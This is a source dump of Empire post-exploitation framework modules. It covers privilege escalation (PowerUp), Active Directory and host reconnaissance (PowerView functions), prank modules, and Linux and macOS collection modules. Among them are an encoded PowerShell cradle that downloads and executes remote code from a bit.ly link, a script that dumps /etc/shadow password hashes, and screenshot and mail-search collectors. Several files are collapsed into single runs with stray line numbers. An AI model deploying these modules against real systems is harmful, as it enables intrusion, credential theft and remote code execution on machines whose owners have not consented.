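            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp'
            ]
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            }
        }

        # mainMenu gives generate() access to installPath (module source + obfuscation)
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the whole PowerUp.ps1 source followed by an Invoke-AllChecks call.

        Unlike the PowerView modules, the full file is shipped rather than the
        extracted dependency closure of one function (the original left that
        extraction commented out).  Output is piped through Out-String and
        followed by an '<name> completed!' marker.  Returns "" (after printing
        an error) when the module source cannot be read.
        """
        moduleName = self.info["Name"]

        moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
        if obfuscate:
            # the obfuscated copy is expected under obfuscated_module_source/
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except IOError:
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        # full module source; helpers.generate_dynamic_powershell_script is
        # deliberately not used here
        script = moduleCode

        scriptEnd = ';' + moduleName + " "

        for option, values in self.options.items():
            if option.lower() == "agent":
                continue
            value = values['Value']
            if not value:
                continue
            if value.lower() == "true":
                # bare switch parameter
                scriptEnd += " -" + str(option)
            else:
                scriptEnd += " -" + str(option) + " " + str(value)

        scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        script += scriptEnd
        return script

--------------------------------------------------------------------------------
/lib/modules/powershell/situational_awareness/host/get_pathacl.py: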
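--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: PowerView Get-PathAcl, enumerating the ACL of a local or UNC path."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        self.info = {
            'Name': 'Get-PathAcl',
            'Author': ['@harmj0y'],
            'Description': ("Enumerates the ACL for a given file path."),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
            ]
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Path' : {
                'Description'   :   'The local/remote (UNC) path to enumerate the ACLs for.',
                'Required'      :   True,
                'Value'         :   ''
            }
        }

        # mainMenu gives generate() access to installPath (module source + obfuscation)
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerView code needed for Get-PathAcl plus a call built from self.options.

        Only the code required for the named function is extracted from
        powerview.ps1 (helpers.generate_dynamic_powershell_script).  Output is
        piped through Out-String and followed by an '<name> completed!' marker.
        Returns "" (after printing an error) when the source cannot be read.
        """
        moduleName = self.info["Name"]

        moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
        try:
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except IOError:
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        # get just the code needed for the specified function
        script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)

        script += moduleName + " "

        for option, values in self.options.items():
            if option.lower() == "agent":
                continue
            value = values['Value']
            if not value:
                continue
            if value.lower() == "true":
                # bare switch parameter
                script += " -" + str(option)
            else:
                script += " -" + str(option) + " " + str(value)

        script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
        if obfuscate:
            script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
        return script

--------------------------------------------------------------------------------
/lib/modules/powershell/situational_awareness/host/get_proxy.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: PowerView Get-Proxy, enumerating proxy/WPAD settings for the current user."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        self.info = {
            'Name': 'Get-Proxy',
            'Author': ['@harmj0y'],
            # typo fix: "conents" -> "contents"
            'Description': ("Enumerates the proxy server and WPAD contents for the current user. Part of PowerView."),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
            ]
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'ComputerName' : {
                'Description'   :   'The computername to enumerate proxy settings on.',
                'Required'      :   False,
                'Value'         :   ''
            }
        }

        # mainMenu gives generate() access to installPath (module source + obfuscation)
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerView code needed for Get-Proxy plus a call built from self.options.

        Only the code required for the named function is extracted from
        powerview.ps1 (helpers.generate_dynamic_powershell_script).  Output is
        piped through Out-String and followed by an '<name> completed!' marker.
        Returns "" (after printing an error) when the source cannot be read.
        """
        moduleName = self.info["Name"]

        moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
        try:
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except IOError:
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        # get just the code needed for the specified function
        script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)

        script += moduleName + " "

        for option, values in self.options.items():
            if option.lower() == "agent":
                continue
            value = values['Value']
            if not value:
                continue
            if value.lower() == "true":
                # bare switch parameter
                script += " -" + str(option)
            else:
                script += " -" + str(option) + " " + str(value)

        script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
        if obfuscate:
            script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
        return script

--------------------------------------------------------------------------------
/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: PowerView Get-NetForest, returning forest information (root domain, SID)."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        self.info = {
            'Name': 'Get-NetForest',
            'Author': ['@harmj0y'],
            'Description': ('Return information about a given forest, including the root domain and SID. Part of PowerView.'),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
            ]
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Forest' : {
                'Description'   :   'The forest name to query domain for, defaults to the current forest.',
                'Required'      :   False,
                'Value'         :   ''
            }
        }

        # mainMenu gives generate() access to installPath (module source + obfuscation)
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerView code needed for Get-NetForest plus a call built from self.options.

        Only the code required for the named function is extracted from
        powerview.ps1 (helpers.generate_dynamic_powershell_script).  Output is
        piped through Out-String and followed by an '<name> completed!' marker.
        Returns "" (after printing an error) when the source cannot be read.
        """
        moduleName = self.info["Name"]

        moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
        try:
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except IOError:
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        # get just the code needed for the specified function
        script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)

        script += moduleName + " "

        for option, values in self.options.items():
            if option.lower() == "agent":
                continue
            value = values['Value']
            if not value:
                continue
            if value.lower() == "true":
                # bare switch parameter
                script += " -" + str(option)
            else:
                script += " -" + str(option) + " " + str(value)

        script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
        if obfuscate:
            script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
        return script

--------------------------------------------------------------------------------
/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: PowerView Get-NetForestDomain, listing every domain in a forest."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        self.info = {
            'Name': 'Get-NetForestDomain',
            'Author': ['@harmj0y'],
            'Description': ('Return all domains for a given forest. Part of PowerView.'),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
            ]
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Forest' : {
                'Description'   :   'The forest name to query domain for, defaults to the current forest.',
                'Required'      :   False,
                'Value'         :   ''
            }
        }

        # mainMenu gives generate() access to installPath (module source + obfuscation)
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerView code needed for Get-NetForestDomain plus a call built from self.options.

        Only the code required for the named function is extracted from
        powerview.ps1 (helpers.generate_dynamic_powershell_script).  Output is
        piped through Out-String and followed by an '<name> completed!' marker.
        Returns "" (after printing an error) when the source cannot be read.
        """
        moduleName = self.info["Name"]

        moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
        try:
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except IOError:
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        # get just the code needed for the specified function
        script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)

        script += moduleName + " "

        for option, values in self.options.items():
            if option.lower() == "agent":
                continue
            value = values['Value']
            if not value:
                continue
            if value.lower() == "true":
                # bare switch parameter
                script += " -" + str(option)
            else:
                script += " -" + str(option) + " " + str(value)

        script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
        if obfuscate:
            script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
        return script

--------------------------------------------------------------------------------
/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: PowerView Get-NetLoggedon, listing users logged on to a host (NetWkstaUserEnum)."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        self.info = {
            'Name': 'Get-NetLoggedon',
            'Author': ['@harmj0y'],
            'Description': ('Execute the NetWkstaUserEnum Win32API call to query a given host for actively logged on users. Part of PowerView.'),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
            ]
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'ComputerName' : {
                # the old text ("local group users") was copied from another
                # module; this one enumerates logged-on users
                'Description'   :   'The hostname or IP to query for logged-on users.',
                'Required'      :   False,
                'Value'         :   'localhost'
            }
        }

        # mainMenu gives generate() access to installPath (module source + obfuscation)
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerView code needed for Get-NetLoggedon plus a call built from self.options.

        Only the code required for the named function is extracted from
        powerview.ps1 (helpers.generate_dynamic_powershell_script).  Output is
        formatted with 'ft -wrap', piped through Out-String and followed by an
        '<name> completed!' marker.  Returns "" (after printing an error) when
        the source cannot be read.
        """
        moduleName = self.info["Name"]

        moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
        try:
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except IOError:
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        # get just the code needed for the specified function
        script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)

        script += moduleName + " "

        for option, values in self.options.items():
            if option.lower() == "agent":
                continue
            value = values['Value']
            if not value:
                continue
            if value.lower() == "true":
                # bare switch parameter
                script += " -" + str(option)
            else:
                script += " -" + str(option) + " " + str(value)

        script += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
        if obfuscate:
            script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
        return script

--------------------------------------------------------------------------------
/lib/modules/powershell/situational_awareness/network/powerview/get_session.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: PowerView Get-NetSession, listing active sessions on a host (NetSessionEnum)."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        self.info = {
            'Name': 'Get-NetSession',
            'Author': ['@harmj0y'],
            'Description': ('Execute the NetSessionEnum Win32API call to query a given host for active sessions on the host. Part of PowerView.'),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
            ]
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'ComputerName' : {
                # the old text ("local group users") was copied from another
                # module; this one enumerates active sessions
                'Description'   :   'The hostname or IP to query for active sessions.',
                'Required'      :   False,
                'Value'         :   'localhost'
            }
        }

        # mainMenu gives generate() access to installPath (module source + obfuscation)
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    # generate() continues beyond this listing; left as in the original.
    def generate(self, obfuscate=False, obfuscationCommand=""):

        moduleName = self.info["Name"]

        # read in the common powerview.ps1 module source code
        moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"

        try:
            f = open(moduleSource, 'r')
        except:
            print helpers.color("[!] 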
Could not read module source path at: " + str(moduleSource)) 69 | return "" 70 | 71 | moduleCode = f.read() 72 | f.close() 73 | 74 | # get just the code needed for the specified function 75 | script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName) 76 | 77 | script += moduleName + " " 78 | 79 | for option,values in self.options.iteritems(): 80 | if option.lower() != "agent": 81 | if values['Value'] and values['Value'] != '': 82 | if values['Value'].lower() == "true": 83 | # if we're just adding a switch 84 | script += " -" + str(option) 85 | else: 86 | script += " -" + str(option) + " " + str(values['Value']) 87 | 88 | script += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' 89 | if obfuscate: 90 | script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) 91 | return script 92 | -------------------------------------------------------------------------------- /lib/modules/powershell/trollsploit/rick_ascii.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'Invoke-RickASCII', 9 | 10 | 'Author': ['@lee_holmes', '@harmj0y'], 11 | 12 | 'Description': ("Spawns a a new powershell.exe process that runs Lee Holmes' ASCII Rick Roll."), 13 | 14 | 'Background' : False, 15 | 16 | 'OutputExtension' : None, 17 | 18 | 'NeedsAdmin' : False, 19 | 20 | 'OpsecSafe' : False, 21 | 22 | 'Language' : 'powershell', 23 | 24 | 'MinLanguageVersion' : '2', 25 | 26 | 'Comments': [ 27 | "http://www.leeholmes.com/blog/2011/04/01/powershell-and-html5/" 28 | ] 29 | } 30 | 31 | # any options needed by the module, settable during runtime 32 | self.options = { 33 | # format: 34 | # value_name : {description, required, default_value} 35 | 'Agent' : { 36 | 'Description' : 'Agent to run module on.', 37 | 'Required' : True, 38 | 
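'Value' : ''
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Build the PowerShell one-liner this module hands to the agent.

        The script starts a maximized powershell.exe with an ``-enc`` (base64,
        UTF-16LE) argument and then emits the string 'Client Rick-Asciied!'.

        Args:
            obfuscate: when true, the finished script is passed through
                ``helpers.obfuscate`` before being returned.
            obfuscationCommand: forwarded unchanged to ``helpers.obfuscate``.

        Returns:
            The PowerShell script as a string (obfuscated if requested).
        """
        # Decoded form of the -enc argument below, kept so the literal can be
        # reviewed without decoding it:
        #   iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")
        #
        # Backslashes in the powershell.exe path are written doubled so the
        # literal does not depend on Python passing unknown escapes such as
        # "\W" through untouched (a SyntaxWarning on newer interpreters); the
        # resulting string is byte-identical to the single-backslash original.
        script = (
            "$Null = Start-Process -WindowStyle Maximized "
            "-FilePath \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" "
            "-ArgumentList \"-enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBpAHQALgBsAHkALwBlADAATQB3ADkAdwAiACkA\"; "
            "'Client Rick-Asciied!'"
        )
        if obfuscate:
            script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
        return script
--------------------------------------------------------------------------------
/lib/modules/powershell/trollsploit/rick_astley.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:

    def __init__(self, mainMenu, params=[]):
        # NOTE(review): the mutable default is left in place on purpose -- the
        # option loop further down in this method iterates ``params`` directly,
        # without a None guard.

        # metadata shown in the module menus; not modified at runtime
        self.info = {
            'Name': 'Get-RickAstley',

            'Author': ['@SadProcessor', '@harmj0y'],

            'Description': ("Runs @SadProcessor's beeping rickroll."),

            'Background' : True,

            'OutputExtension' : None,

            'NeedsAdmin' : False,

            'OpsecSafe' : False,

            'Language' : 'powershell',

            'MinLanguageVersion' : '2',

            'Comments': [
                "https://gist.github.com/SadProcessor/3e413f9542b01ee90979"
            ]
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            # value_name : {description, required,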
default_value} 35 | 'Agent' : { 36 | 'Description' : 'Agent to run module on.', 37 | 'Required' : True, 38 | 'Value' : '' 39 | } 40 | } 41 | 42 | # save off a copy of the mainMenu object to access external functionality 43 | # like listeners/agent handlers/etc. 44 | self.mainMenu = mainMenu 45 | 46 | for param in params: 47 | # parameter format is [Name, Value] 48 | option, value = param 49 | if option in self.options: 50 | self.options[option]['Value'] = value 51 | 52 | 53 | def generate(self, obfuscate=False, obfuscationCommand=""): 54 | 55 | moduleName = self.info["Name"] 56 | 57 | # read in the common powerup.ps1 module source code 58 | moduleSource = self.mainMenu.installPath + "/data/module_source/trollsploit/Get-RickAstley.ps1" 59 | if obfuscate: 60 | helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) 61 | moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") 62 | try: 63 | f = open(moduleSource, 'r') 64 | except: 65 | print helpers.color("[!] 
Could not read module source path at: " + str(moduleSource)) 66 | return "" 67 | 68 | script = f.read() 69 | f.close() 70 | 71 | scriptEnd = moduleName + " " 72 | 73 | scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' 74 | if obfuscate: 75 | scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) 76 | script += scriptEnd 77 | return script 78 | -------------------------------------------------------------------------------- /lib/modules/powershell/trollsploit/voicetroll.py: -------------------------------------------------------------------------------- 1 | import base64 2 | from lib.common import helpers 3 | 4 | class Module: 5 | 6 | def __init__(self, mainMenu, params=[]): 7 | 8 | self.info = { 9 | 'Name': 'Invoke-VoiceTroll', 10 | 11 | 'Author': ['@424f424f'], 12 | 13 | 'Description': ("Reads text aloud via synthesized voice on target."), 14 | 15 | 'Background' : True, 16 | 17 | 'OutputExtension' : None, 18 | 19 | 'NeedsAdmin' : False, 20 | 21 | 'OpsecSafe' : False, 22 | 23 | 'Language' : 'powershell', 24 | 25 | 'MinLanguageVersion' : '2', 26 | 27 | 'Comments': [ 28 | 'http://www.instructables.com/id/Make-your-computer-talk-with-powershell/' 29 | ] 30 | } 31 | 32 | # any options needed by the module, settable during runtime 33 | self.options = { 34 | # format: 35 | # value_name : {description, required, default_value} 36 | 'Agent' : { 37 | 'Description' : 'Agent to run module on.', 38 | 'Required' : True, 39 | 'Value' : '' 40 | }, 41 | 'VoiceText' : { 42 | 'Description' : 'Text to synthesize on target.', 43 | 'Required' : True, 44 | 'Value' : '' 45 | } 46 | } 47 | 48 | # save off a copy of the mainMenu object to access external functionality 49 | # like listeners/agent handlers/etc. 
50 | self.mainMenu = mainMenu 51 | 52 | for param in params: 53 | # parameter format is [Name, Value] 54 | option, value = param 55 | if option in self.options: 56 | self.options[option]['Value'] = value 57 | 58 | 59 | def generate(self, obfuscate=False, obfuscationCommand=""): 60 | 61 | script = """ 62 | Function Invoke-VoiceTroll 63 | 64 | { 65 | [CmdletBinding()] 66 | Param ( 67 | [Parameter(Mandatory = $True, Position = 0)] 68 | [ValidateNotNullOrEmpty()] 69 | [String] $VoiceText 70 | ) 71 | 72 | Set-StrictMode -version 2 73 | Add-Type -AssemblyName System.Speech 74 | $synth = New-Object -TypeName System.Speech.Synthesis.SpeechSynthesizer 75 | $synth.Speak($VoiceText) 76 | } 77 | Invoke-VoiceTroll""" 78 | 79 | for option,values in self.options.iteritems(): 80 | if option.lower() != "agent" and option.lower() != "computername": 81 | if values['Value'] and values['Value'] != '': 82 | if values['Value'].lower() == "true": 83 | # if we're just adding a switch 84 | script += " -" + str(option) 85 | else: 86 | script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" 87 | if obfuscate: 88 | script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) 89 | return script 90 | -------------------------------------------------------------------------------- /lib/modules/python/collection/linux/hashdump.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | import pdb 3 | 4 | class Module: 5 | 6 | def __init__(self, mainMenu, params=[]): 7 | 8 | # metadata info about the module, not modified during runtime 9 | self.info = { 10 | # name for the module that will appear in module menus 11 | 'Name': 'Linux Hashdump', 12 | 13 | # list of one or more authors for the module 14 | 'Author': ['@harmj0y'], 15 | 16 | # more verbose multi-line description of the module 17 | 'Description': ("Extracts the /etc/passwd and /etc/shadow, unshadowing the 
result."), 18 | 19 | # True if the module needs to run in the background 20 | 'Background' : False, 21 | 22 | # File extension to save the file as 23 | 'OutputExtension' : "", 24 | 25 | # if the module needs administrative privileges 26 | 'NeedsAdmin' : True, 27 | 28 | # True if the method doesn't touch disk/is reasonably opsec safe 29 | 'OpsecSafe' : True, 30 | 31 | # the module language 32 | 'Language' : 'python', 33 | 34 | # the minimum language version needed 35 | 'MinLanguageVersion' : '2.6', 36 | 37 | # list of any references/other comments 38 | 'Comments': [] 39 | } 40 | 41 | # any options needed by the module, settable during runtime 42 | self.options = { 43 | # format: 44 | # value_name : {description, required, default_value} 45 | 'Agent' : { 46 | # The 'Agent' option is the only one that MUST be in a module 47 | 'Description' : 'Agent to execute module on.', 48 | 'Required' : True, 49 | 'Value' : '' 50 | } 51 | } 52 | 53 | # save off a copy of the mainMenu object to access external functionality 54 | # like listeners/agent handlers/etc. 55 | self.mainMenu = mainMenu 56 | 57 | # During instantiation, any settable option parameters 58 | # are passed as an object set to the module and the 59 | # options dictionary is automatically set. 
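# This is mostly
        # in case options are passed on the command line
        if params:
            for param in params:
                # parameter format is [Name, Value]
                option, value = param
                if option in self.options:
                    self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the Python source the agent executes for this module.

        The returned text runs on the agent, not here: it reads
        ``/etc/passwd`` and ``/etc/shadow`` (hence ``NeedsAdmin`` in the
        module info) and prints one ``user:hash:passwd-fields`` line for
        every account that appears in both files.

        Args:
            obfuscate: accepted for signature parity with the other modules;
                not used by this module.
            obfuscationCommand: likewise unused here.

        Returns:
            The agent-side script as a string.
        """
        script = """
f = open("/etc/passwd")
passwd = f.readlines()
f.close()

f2 = open("/etc/shadow")
shadow = f2.readlines()
f2.close()

users = {}

for line in shadow:
    parts = line.strip().split(":")
    username, pwdhash = parts[0], parts[1]
    users[username] = pwdhash

for line in passwd:
    parts = line.strip().split(":")
    username = parts[0]
    info = ":".join(parts[2:])
    if username in users:
        print "%s:%s:%s" %(username, users[username], info)
"""

        return script
--------------------------------------------------------------------------------
/lib/modules/python/collection/osx/screenshot.py:
--------------------------------------------------------------------------------
class Module:

    def __init__(self, mainMenu, params=None):
        # ``params`` defaults to None instead of a shared list literal; the
        # option loop later in this method only iterates it when it is truthy,
        # so callers that omit it see no change.

        # metadata info about the module, not modified during runtime
        self.info = {
            # name for the module that will appear in module menus
            'Name': 'Screenshot',

            # list of one or more authors for the module
            'Author': ['@harmj0y'],

            # more verbose multi-line description of the module
            'Description': ('Takes a screenshot of an OSX desktop using screencapture and returns the data.'),

            # True if the module needs to run in the background
            'Background': False,

            # File extension to save the file as
            'OutputExtension': "png",

            # if the module needs administrative privileges
            'NeedsAdmin': False,

            # True if the method doesn't touch disk/is reasonably opsec safe
            'OpsecSafe': False,

            # the module language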
'Language' : 'python', 30 | 31 | # the minimum language version needed 32 | 'MinLanguageVersion' : '2.6', 33 | 34 | # list of any references/other comments 35 | 'Comments': [] 36 | } 37 | 38 | # any options needed by the module, settable during runtime 39 | self.options = { 40 | # format: 41 | # value_name : {description, required, default_value} 42 | 'Agent': { 43 | # The 'Agent' option is the only one that MUST be in a module 44 | 'Description' : 'Agent to execute module on.', 45 | 'Required' : True, 46 | 'Value' : '' 47 | }, 48 | 'SavePath': { 49 | 'Description' : 'Path of the temporary screenshot file to save.', 50 | 'Required' : True, 51 | 'Value' : '/tmp/out.png' 52 | } 53 | } 54 | 55 | # save off a copy of the mainMenu object to access external functionality 56 | # like listeners/agent handlers/etc. 57 | self.mainMenu = mainMenu 58 | 59 | # During instantiation, any settable option parameters 60 | # are passed as an object set to the module and the 61 | # options dictionary is automatically set. 
This is mostly 62 | # in case options are passed on the command line 63 | if params: 64 | for param in params: 65 | # parameter format is [Name, Value] 66 | option, value = param 67 | if option in self.options: 68 | self.options[option]['Value'] = value 69 | 70 | def generate(self, obfuscate=False, obfuscationCommand=""): 71 | 72 | savePath = self.options['SavePath']['Value'] 73 | 74 | script = """ 75 | # take a screenshot using screencapture 76 | run_command('screencapture -x %s') 77 | # base64 up resulting file, delete the file, return the base64 of the png output 78 | # mocked from the Empire screenshot module 79 | f = open('%s', 'rb') 80 | data = f.read() 81 | f.close() 82 | run_command('rm -f %s') 83 | print data 84 | """ % (savePath, savePath, savePath) 85 | 86 | return script 87 | -------------------------------------------------------------------------------- /lib/modules/python/collection/osx/search_email.py: -------------------------------------------------------------------------------- 1 | class Module: 2 | 3 | def __init__(self, mainMenu, params=[]): 4 | 5 | # metadata info about the module, not modified during runtime 6 | self.info = { 7 | # name for the module that will appear in module menus 8 | 'Name': 'SearchEmail', 9 | 10 | # list of one or more authors for the module 11 | 'Author': ['@harmj0y'], 12 | 13 | # more verbose multi-line description of the module 14 | 'Description': ("Searches for Mail .emlx messages, optionally only returning " 15 | "messages with the specified SeachTerm."), 16 | 17 | # True if the module needs to run in the background 18 | 'Background' : False, 19 | 20 | # File extension to save the file as 21 | 'OutputExtension' : "", 22 | 23 | # if the module needs administrative privileges 24 | 'NeedsAdmin' : False, 25 | 26 | # True if the method doesn't touch disk/is reasonably opsec safe 27 | 'OpsecSafe' : True, 28 | 29 | # the module language 30 | 'Language' : 'python', 31 | 32 | # the minimum language version needed 33 | 
